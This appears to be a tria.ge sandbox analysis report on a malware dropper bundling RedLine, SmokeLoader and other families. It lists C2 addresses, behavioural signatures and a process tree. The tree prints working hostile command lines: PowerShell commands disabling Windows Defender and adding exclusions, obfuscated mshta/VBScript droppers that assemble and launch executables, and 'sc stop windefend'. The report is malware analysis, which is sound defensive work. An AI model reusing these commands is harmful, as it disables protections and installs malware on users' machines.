Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
704s -
max time network
1247s -
platform
windows11_x64 -
resource
win11 -
submitted
08/11/2021, 16:12
General
-
Target
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
fucker2
C2
135.181.129.119:4805
Extracted
Family
redline
Botnet
Chris
C2
194.104.136.5:46013
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
smokeloader
Version
2020
C2
http://nalirou70.top/
http://xacokuo80.top/
rc4.i32
rc4.i32
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 42 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 20 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
UAC bypass 3 TTPs
-
Windows security bypass 2 TTPs
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 8 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 4 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 15 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 15 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 16 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
-
Suspicious use of SetThreadContext 16 IoCs
-
Drops file in Program Files directory 21 IoCs
-
Drops file in Windows directory 14 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 39 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 7 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 6 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 10 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 5 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe"C:\Users\Admin\AppData\Local\Temp\9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12fb2a5c52f05816.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exeWed12fb2a5c52f05816.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCripT:cLOSe ( creaTeoBJeCT ( "wSCrIpT.shell" ).RuN ( "CMd.ExE /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe"" VAKlCUnlQu.exe && STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If """" =="""" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe"" ) do taskkill -F -IM ""%~nxE"" " ,0 , TRUe ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe" VAKlCUnlQu.exe && STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If "" =="" for %E in ( "C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe" ) do taskkill -F -IM "%~nxE"8⤵
-
C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exeVAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCripT:cLOSe ( creaTeoBJeCT ( "wSCrIpT.shell" ).RuN ( "CMd.ExE /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe"" VAKlCUnlQu.exe && STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If ""-PRwIZKFgSE6xyUR7ivEyVbD3Oolfm "" =="""" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe"" ) do taskkill -F -IM ""%~nxE"" " ,0 , TRUe ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe" VAKlCUnlQu.exe && STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If "-PRwIZKFgSE6xyUR7ivEyVbD3Oolfm " =="" for %E in ( "C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe" ) do taskkill -F -IM "%~nxE"11⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt: cLoSE ( CREaTEOBjECt ( "wSCRiPt.shell" ). RUn ( "cmD.exE /c eCHo | SEt /P = ""MZ"" > s4AW._YK & CoPy /B /y s4aW._YK + 4kt1N2.SAG + JISYX0.0 CFIfB.3 & DEl 4KT1N2.SAG JiSYX0.0 S4AW._YK& STArt msiexec /y .\CFIFB.3 ", 0 ,TRuE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHo | SEt /P = "MZ" > s4AW._YK & CoPy /B /y s4aW._YK+ 4kt1N2.SAG + JISYX0.0 CFIfB.3 & DEl 4KT1N2.SAG JiSYX0.0 S4AW._YK& STArt msiexec /y .\CFIFB.311⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>s4AW._YK"12⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "12⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec /y .\CFIFB.312⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "Wed12fb2a5c52f05816.exe"9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1217e6a0ef74ed.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed1217e6a0ef74ed.exeWed1217e6a0ef74ed.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12bcd18bdbc441.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12bcd18bdbc441.exeWed12bcd18bdbc441.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12859e3c1cf63b6a0.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12859e3c1cf63b6a0.exeWed12859e3c1cf63b6a0.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12859e3c1cf63b6a0.exeC:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12859e3c1cf63b6a0.exe7⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12fbb08f1dfc28.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fbb08f1dfc28.exeWed12fbb08f1dfc28.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 2447⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12ebaf7883e1890d.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12ebaf7883e1890d.exeWed12ebaf7883e1890d.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1241cc206cfb.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed1241cc206cfb.exeWed1241cc206cfb.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6736747.exe"C:\Users\Admin\AppData\Roaming\6736747.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\227470.exe"C:\Users\Admin\AppData\Roaming\227470.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\3551538.exe"C:\Users\Admin\AppData\Roaming\3551538.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\3601344.exe"C:\Users\Admin\AppData\Roaming\3601344.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\3601344.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\3601344.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\3601344.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\3601344.exe" ) do taskkill -f -Im "%~NXZ"9⤵
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"12⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ). RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q *12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"13⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "13⤵
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K16⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "3601344.exe"10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\189629.exe"C:\Users\Admin\AppData\Roaming\189629.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\503782.exe"C:\Users\Admin\AppData\Roaming\503782.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed121f7e9e92793cf.exe5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed129eb9b8859.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed129eb9b8859.exeWed129eb9b8859.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\CUdVFaUwSqvIYDEDWI1VHn3_.exe"C:\Users\Admin\Pictures\Adobe Films\CUdVFaUwSqvIYDEDWI1VHn3_.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 2808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PsHhTfowuIHRylZl4gkpCI9u.exe"C:\Users\Admin\Pictures\Adobe Films\PsHhTfowuIHRylZl4gkpCI9u.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 2808⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"7⤵
- Executes dropped EXE
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\test.bat"9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\test.bat"9⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force8⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"8⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\test.bat"10⤵
-
C:\Windows\system32\sc.exesc stop windefend11⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\test.bat"10⤵
-
C:\Windows\system32\sc.exesc stop windefend11⤵
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force9⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force9⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force9⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force9⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force9⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force9⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"9⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"9⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force8⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"8⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"8⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"8⤵
-
-
